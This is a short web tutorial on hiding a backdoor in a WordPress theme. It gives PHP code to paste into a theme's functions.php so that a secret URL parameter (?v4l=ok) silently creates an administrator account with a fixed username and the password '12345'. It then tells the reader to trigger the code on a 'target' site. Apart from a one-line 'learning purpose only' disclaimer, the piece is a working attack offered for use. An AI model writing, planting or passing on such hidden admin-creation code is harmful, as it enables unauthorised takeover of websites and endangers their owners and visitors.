How to Hack WordPress Site with Theme Installing?

WordPress is a free and open-source blogging tool and a content management system (CMS) based on PHP and MySQL. Features include a plugin architecture and a template system. WordPress was used by more than 23.3% of the top 10 million websites as of January 2015. WordPress is the most popular blogging system in use on the Web. at more than 60 million websites. It was first released on May 27, 2003, by its founders, Matt Mullenweg and Mike Little, as a fork of b2/cafelog. The license under which WordPress software is released is the GPLv2 (or later) from the Free Software Foundation.

Today we will learn about WordPress Hacking Tutorials to Add Administrator User Secretly through themes. First we will learn about WP themes. WordPress users may install and switch between themes. Themes allow users to change the look and functionality of a WordPress website and they can be installed without altering the content or health of the site. Every WordPress website requires at least one theme to be present. Every WordPress theme should be designed using some standards with structured PHP, valid HTML and CSS. Today, JavaScript and jQuery are being used to add responsiveness to the themes. Themes may be installed using the WordPress “Appearance” administration tool or theme folders may be uploaded via FTP. The PHP, HTML (HyperText Markup Language) and CSS (Cascading Style Sheets) code found in themes can be added to or edited for providing advanced features. WordPress themes are in general classified into two categories, free themes and premium themes. WordPress users may also create and develop their own custom themes if they have the knowledge and skill to do so.
Requirements:
  1. Basic PHP Language Knowledge
  2. Know WordPress codex.
  3. A WP Theme

Let’s Go:
#1: Download any WP Theme. (I used Rowling By Anders Noren)
#2: Unzip Theme and Extract theme folder to desktop.
#3: Find “functions.php” file from the theme folder.

   

#4: Open the Function file with Notepad. I recommend Notepad++. Download it for free.
#5: Add below simple codes just after <?php tag.

// Script for Add user secretly
add_action('wp_head',  'wp_dd_wp_hack');
function wp_dd_wp_hack()  {
 If ($_GET['v4l'] == 'ok')  {
 require('wp-includes/registration.php');
 if (!username_exists('wordpress'))  {
 $user_id = wp_create_user('DesignDevta',  '12345');
 $user = new WP_User($user_id);
 $user->set_role('administrator');
}
}}


#6: Save the File.

#7: Now add ?v4l=ok parameter with target website i.e. http://target-site.com/?v4l=ok

#8: Maybe you think that nothing happened with it but you have successfully added an admin user in target website.

#9: New Administration Username and Password:

Username: DesignDevta
Password: 12345
#10: Done. But this trick is for learning purpose only.
Original Source: Hacking Tutorial


Leave a Reply

Your email address will not be published. Required fields are marked *